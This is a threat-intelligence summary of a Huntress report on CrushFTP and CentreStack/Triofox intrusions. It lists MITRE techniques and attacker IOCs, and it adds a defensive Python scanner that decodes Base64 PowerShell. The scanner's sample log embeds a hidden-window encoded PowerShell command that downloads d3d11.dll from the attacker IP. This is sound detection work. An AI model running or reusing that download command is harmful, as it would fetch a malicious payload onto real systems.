Huntress analysts reported on two vulnerabilities involving CrushFTP and CentreStack/Triofox, highlighting common IOCs and TTPs used by threat actors across different incidents. They emphasized that consistent tactics were applied after exploiting initial vulnerabilities, underscoring the need for comprehensive incident response. (Affected: CrushFTP, CentreStack, Triofox, Windows Defender)
Key points:
- Recent Huntress reports detail two vulnerabilities exploited in distinct cyber incidents.
- Common indicators of compromise (IOCs) across incidents include specific IP addresses and file names.
- Threat actors exhibit similar tactics after gaining initial access via different vulnerabilities.
- Effective security tools can halt attacks before significant damage occurs.
- Organizations are advised to create asset inventories and implement attack surface reductions.
MITRE Techniques:
- T1069 – **Permission Groups Discovery**: Threat actors exploited vulnerabilities to gain initial access to systems.
- T1071 – **Application Layer Protocol**: Utilized Base64-encoded PowerShell commands to transfer files during attacks.
- T1203 – **Exploitation for Client Execution**: Exploited CrushFTP and CentreStack vulnerabilities for access.
- T1560 – **Archive Collected Data**: Downloaded malicious files like d3d11.dll and Centre.exe during incidents.
Indicators of Compromise:
- The article mentions the IP address 2.58.56[.]16 as a source for threat actor activity.
- A second IP, 196.251.85[.]31, is noted for downloading exploitation tools.
- The Mesh Agent connect endpoint, rtb[.]mftadsrvr[.]com, is the address the installed agent is configured to connect back to.
- The malicious DLL file, d3d11.dll, was frequently referenced as part of the attacks.
- Centre.exe, which was detected as Cobalt Strike, was another file involved in the incidents.
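As an added example (not part of the Huntress post or this summary), a small Python scanner that refangs the IOCs listed above, matches them against constructed log lines, and decodes a Base64 `-EncodedCommand` PowerShell invocation of the kind the post describes, so that IOCs hidden inside the encoded script are caught as well; the sample log lines, timestamps and the encoded script body are assumptions made up for the example.

```python
import base64
import re
# IOCs as listed in the summary above, kept defanged the way the post writes them.
DEFANGED_IOCS = {
    "2.58.56[.]16": "threat actor source IP",
    "196.251.85[.]31": "download of exploitation tools",
    "rtb[.]mftadsrvr[.]com": "Mesh Agent connect endpoint",
    "d3d11.dll": "malicious DLL",
    "Centre.exe": "Cobalt Strike payload",
}
def refang(ioc: str) -> str:
    """Undo '[.]' / 'hxxp' defanging so the value can be matched against raw logs."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")

IOCS = {refang(k): v for k, v in DEFANGED_IOCS.items()}
# powershell ... -e/-ec/-enc/-EncodedCommand <base64 blob>
ENC_PS = re.compile(
    r"(?i)powershell(?:\.exe)?[^\n]*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

def decode_encoded_command(blob: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_line(line: str) -> list:
    """IOC hits for one log line, including IOCs hidden inside an encoded command."""
    hits = [f"ioc:{ioc} ({why})" for ioc, why in IOCS.items() if ioc.lower() in line.lower()]
    m = ENC_PS.search(line)
    if m:
        decoded = decode_encoded_command(m.group(1))
        hits.append("encoded-powershell:" + (decoded.strip() if decoded else "<undecodable>"))
        if decoded:
            hits += scan_line(decoded)  # the encoded script may name the IOCs too
    return hits

def scan(lines) -> dict:
    """Map line index -> hits, omitting clean lines."""
    return {i: h for i, line in enumerate(lines) if (h := scan_line(line))}

# Constructed sample log lines (timestamps, hostnames and the encoded script are made up).
_cmd = "Invoke-WebRequest -Uri http://196.251.85.31/d3d11.dll -OutFile d3d11.dll"
ENC_BLOB = base64.b64encode(_cmd.encode("utf-16-le")).decode()
SAMPLE_LOGS = [
    "2025-04-10T12:00:01Z crushftp access from 2.58.56.16 path=/WebInterface/",
    "2025-04-10T12:00:05Z proc-create powershell.exe -nop -w hidden -Enc " + ENC_BLOB,
    "2025-04-10T12:01:00Z dns query rtb.mftadsrvr.com from host01",
    "2025-04-10T12:02:00Z user alice logged in from 10.0.0.5",
]
```

Run `scan(SAMPLE_LOGS)` to see that the second line is flagged not only for the encoded PowerShell itself but also for the download IP and DLL name that only appear after decoding.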
Full Story: https://www.huntress.com/blog/do-tigers-really-change-their-stripes